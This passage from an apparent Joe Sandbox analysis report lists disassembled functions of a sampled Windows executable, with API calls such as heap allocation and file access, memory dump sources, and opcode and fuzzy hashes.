                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D211E372640215ABCF18AB60EC02FAD7BE5AF50714F20952DF542B61D2EEB1DA05DB50
                                                                                                                                                                                                                                                                                                    Function 00E58782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 47209ae146d5eac8eda58c64ba26d1b50f140cc58263ca291ae0fefcbebedb93
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5b758dffcd433f95e4bd8c983643cf7e8130199ae8b8d6fcfd5b3e64307b799c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47209ae146d5eac8eda58c64ba26d1b50f140cc58263ca291ae0fefcbebedb93
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8311487290420AEFCB05DF58E94099A7BF4EF48300F1044A9FC09BB311DA31EA15CB64
                                                                                                                                                                                                                                                                                                    Function 00E55373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E54FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00E5319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00E55031
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E553DF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                    • Instruction ID: d9601106febd89dc6221a765086995170f19ba7b312edb71eba3f4a688290cf3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6801DB736007056BE3218E69DC4195AFBE9EB853B1F65092DE98493280EA7069098774
                                                                                                                                                                                                                                                                                                    Function 00E4E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                    • Instruction ID: d17584738a7e86b6bd87e5274d4bf0ba28832652658d1886b7afc93a19c9ac97
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBF02D3250161056D6723A3BBC05B5A33D89FC2335F106B55FE25B33D1EB70D80686D2
                                                                                                                                                                                                                                                                                                    Function 00E2B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1763487e7dbeca54f6de5a956e26a3b5e3f91505a6dc7eecf08aeda0b41489d8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F0C8B36017146ED7149F29EC06FA6BB98EB44360F10812AFB19DB2D1DB71E510CBA0
                                                                                                                                                                                                                                                                                                    Function 00E9F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00E9F987
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2664df668bf7db0b5e162bb41ecad2ab27bce4c06a77c493bd4cb599a9a3c44f
                                                                                                                                                                                                                                                                                                    • Instruction ID: d911ca9f75ccab912641450fd09aa66d06eff30d0ac14f8e28511ca4ccc5945d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2664df668bf7db0b5e162bb41ecad2ab27bce4c06a77c493bd4cb599a9a3c44f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F03172A00115BFDB05EBA5EC46D9F77F8EF45710F005065F505BB361DA70A941C751
                                                                                                                                                                                                                                                                                                    Function 00E54FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00E5319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00E55031
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d757900c52be2942d9467905d0175cc6a1155e6564f54fdca631f3adc1d517ca
                                                                                                                                                                                                                                                                                                    • Instruction ID: 146695f7995bbc8654521fad7c7189eb40b8751f3f3cc20a634e97befde45e96
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d757900c52be2942d9467905d0175cc6a1155e6564f54fdca631f3adc1d517ca
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BF0B433511E20A7DB315E26DC11A5A3798AF807A1F156821FC04BB0E0DA60D80986E0
                                                                                                                                                                                                                                                                                                    Function 00E53B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00E46A79,?,0000015D,?,?,?,?,00E485B0,000000FF,00000000,?,?), ref: 00E53BC5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 20a4ad967ae8fdcc51df147cf7bf6bfc834eb99129b04c91fd43c7e1fbec0b8a
                                                                                                                                                                                                                                                                                                    • Instruction ID: b0aa0a881b516a60e3bc3318e70593106a28402d0f5814b5420d36891ac182e3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20a4ad967ae8fdcc51df147cf7bf6bfc834eb99129b04c91fd43c7e1fbec0b8a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3E0ED22201620ABDAA12A77AC01B9B3A8CAF413E7F152D61EC04B60A1DB70DE0881E0
                                                                                                                                                                                                                                                                                                    Function 00E266E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0a09e67e5dd19dc5fb957720c5472511d339ceaffccbf119e564de5062d96eee
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c889fc074adc1eaa22fc6bb765f2e8b5d5c82cc3d03d45dd595e8ecc776519a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a09e67e5dd19dc5fb957720c5472511d339ceaffccbf119e564de5062d96eee
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F06D71105722CFCB349F64F8A0856BBF4BF143693249A7EE2D7A6610C7719844DF50
                                                                                                                                                                                                                                                                                                    Function 00E76AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 680bc15acd4a141d6b8f3cbac73bf36037708d929c9862da58027216eed5ec88
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3db2546f7c7c6ebd43503f6bac48e3fea88016f170732ef9d2f4d5b5bb97b37d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 680bc15acd4a141d6b8f3cbac73bf36037708d929c9862da58027216eed5ec88
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F0E571708641AAE7305B6498097E1FBE8AB4031DF10A66ED5D9E2181D7B28494DB51
                                                                                                                                                                                                                                                                                                    Function 00E2684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2c88fac3513e40a7b41a9c878e8f97fd974d4b327234585d7bffcb6a8220eeb7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F0587650020DFFDF05CF80C941E9EBBB9FB04308F208045F9149A211C336EA21ABA0
                                                                                                                                                                                                                                                                                                    Function 00E23907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E23963
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: fd70ac83c0f139606b69d59493c690b87d7502e24f77f33070cfffadc2de5cfb
                                                                                                                                                                                                                                                                                                    • Instruction ID: e0ee7e13a14a6d97366741690dfd7bbee40c773d906785e83b886d0dd27f9256
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd70ac83c0f139606b69d59493c690b87d7502e24f77f33070cfffadc2de5cfb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3F082B09053199FE7529B24EC45B967BBCA741708F0000A9A244B6181D7744B8CCF41
                                                                                                                                                                                                                                                                                                    Function 00E23A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E23A76
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d144526ec2351f74aa447fee89d4574578f1e4f13adcc137bc4deefeec2ecbc
                                                                                                                                                                                                                                                                                                    • Instruction ID: e8ba1a36e91fb2509488a380554e8931ca8a33e5248df45a9dcdc2c7182821c2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d144526ec2351f74aa447fee89d4574578f1e4f13adcc137bc4deefeec2ecbc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DE0CD769001245BC7109258AC05FDA77DDDFC8790F044175FD05E7254D960DD808590
                                                                                                                                                                                                                                                                                                    Function 00E6071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00E60A84,?,?,00000000,?,00E60A84,00000000,0000000C), ref: 00E60737
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4e6960de8733ebbac7c4655405e45a0219d03ffb6c7b39ca53170007f20ab7eb
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1ab8b0cd3bbfc3d15165e8079303166eb58938dc9c8d05701443e5694175743d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e6960de8733ebbac7c4655405e45a0219d03ffb6c7b39ca53170007f20ab7eb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D06C3200010DBFDF028F85DD06EDA3BAAFB48714F014100BE5866020C732E821AB90
                                                                                                                                                                                                                                                                                                    Function 00E8EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00E8D840), ref: 00E8EAB1
